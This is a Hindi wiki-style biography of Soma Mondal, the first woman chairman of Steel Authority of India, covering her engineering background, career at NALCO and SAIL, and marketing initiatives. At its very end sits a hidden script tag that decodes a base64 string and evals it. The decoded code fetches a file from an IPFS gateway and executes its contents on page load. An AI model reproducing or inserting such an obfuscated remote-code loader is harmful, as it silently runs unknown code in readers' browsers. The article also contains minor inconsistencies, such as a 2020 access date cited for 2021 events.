सोमा मंडल

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:नेविगेशन, खोजें
सोमा मंडल

सोमा मंडल (अंग्रेज़ी: Soma Mondal) को 'स्टील अथॉरिटी ऑफ इंडिया लिमिटेड' (सेल) का चेयरमैन बनाया गया है। उन्होंने 1 जनवरी, 2021 को अपना पदभार ग्रहण कर लिया। सोमा मंडल सेल की पहली महिला फंक्शनल डायरेक्टर होने के साथ ही पहली महिला चेयरमैन भी हैं।

परिचय

सोमा मंडल ने 1984 में राउरकेला स्थित नेशनल इंस्टिट्यूट ऑफ टेक्नोलॉजी से इलेक्ट्रिकल इंजीनियरिंग में ग्रेजुएशन की डिग्री ली। उनके पास मेटल इंडस्ट्री में 35 साल का अनुभव है। सोमा मंडल ने सबसे पहले अपना काम नाल्को में ग्रेजुएट इंजीनियर ट्रेनी के तौर पर शुरू किया। कड़ी मेहनत और निरंतर कार्यों का नतीजा रहा कि 2014 में सोमा मंडल को नाल्को में मेंटल ऑफ डायरेक्टर का पद मिला। सेल कंपनी में सोमा मंडल को 2017 में डायरेक्टर (कॉमर्शियल) का पद दिया गया था। यह पदभार ग्रहण करते ही सोमा मंडल ने सेल की मार्केटिंग स्ट्रेटजी को नई पहचान दी। साल 2017 में उन्होंने कंपनी की स्ट्रेटजी के लिए एक विस्तृत रोडमैप बनाया। इस रोडमैप का नतीजा हुआ कि 2017 से कंपनी की सेल्स और बाजार का दायरा लगातार बढ़ता चला गया। एक साल के अंदर कंपनी की बाजार में पहुंच व्यापक हो गई।[1]

योगदान

2017-2018 और 2019-2020 के तीन वित्तीय वर्षों में कंपनी की सेल सबसे ज्यादा रही और यह आगे भी जारी रही। मौजूदा वित्त वर्ष 2020-21 में भी कंपनी की सेल्स वॉल्यूम में लगातार उछाल देखी जा रही है। कोविड-19 महामारी में आर्थिक सुस्ती के बावजूद कंपनी की सेल्स पर कोई फर्क नहीं पड़ा है और इसमें निरंतरता बनी हुई है। सोमा मंडल कंपनी के कई प्रोडक्ट की ब्रांडिंग को प्रमोट करने पर ध्यान रखती हैं। कंपनी के दो चर्चित प्रोडक्ट नेक्स और सेल एसईक्यूआर को लॉन्च कराने में उनका महत्वपूर्ण योगदान है। पीएफ स्ट्रक्चरल सेक्शन और टीएमटी बार्स जैसे प्रोडक्ट को प्रमोट करने के लिए सोमा मंडल ने कड़ी मेहनत की।

गांव की ओर

सोमा मंडल ने एक रणनीति के तहत टू-टीयर डिस्ट्रीब्यूशन नेटवर्क को तरजीह दी है। रिटेल चैनल के जरिये सेल को बढ़ावा देने के लिए उन्होंने टू-टीयर डिस्ट्रीब्यूशन नेटवर्क को बढ़ावा दिया है। ग्रामीण इलाके की विस्तृत क्षमता को भुनाने और लोगों को सेल की प्रोडक्ट के बारे में बताने के लिए सोमा मंडल के नेतृत्व में ‘गांव की ओर’ वर्कशॉप का आयोजन किया गया। सेल का यह कार्यक्रम देश के लगभग सभी राज्यों और संघ शासित प्रदेशों में चलाया गया।[1]

सेल का आधुनिकीकरण और विस्तार

विश्व स्तरीय बिजनेस में तमाम चुनौतियों के बावजूद सेल कंपनी उम्मीदों पर खरा उतरने के लिए समय-समय पर रिफॉर्म्स लेकर आती है। ये रिफॉर्म्स खास तौर पर सेल के मार्केटिंग ऑर्गनाइजेशन में समय-समय पर किए जाते रहे हैं। इस रिफॉर्म को धरातल पर उतारने में सोमा मंडल का सबसे अहम रोल है। कंपनी की मार्केटिंग और मैनेजमेंट में बेहतरी के लिए सेल के आधुनिकीकरण और विस्तार पर ध्यान दिया गया। इसके लिए सोमा मंडल ने सेल में तीन वर्टिकल सेल्स, मार्केटिंग और सर्विस का गठन किया। इससे मार्केटिंग ऑपरेशन को सहजता से चलाने में मदद मिली। सोमा मंडल सीआईआई-नेशनल कमेटी ऑन स्टील की मेंबर हैं और सीआईआई सब कमेटी ऑन सेफगार्ड फॉर टैरिफ एंड नॉन-टैरिफ बैरियर की चेयरपर्सन हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 जानिए कौन हैं सोमा मंडल (हिंदी) tv9hindi.com। अभिगमन तिथि: 14 मार्च, 2020।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>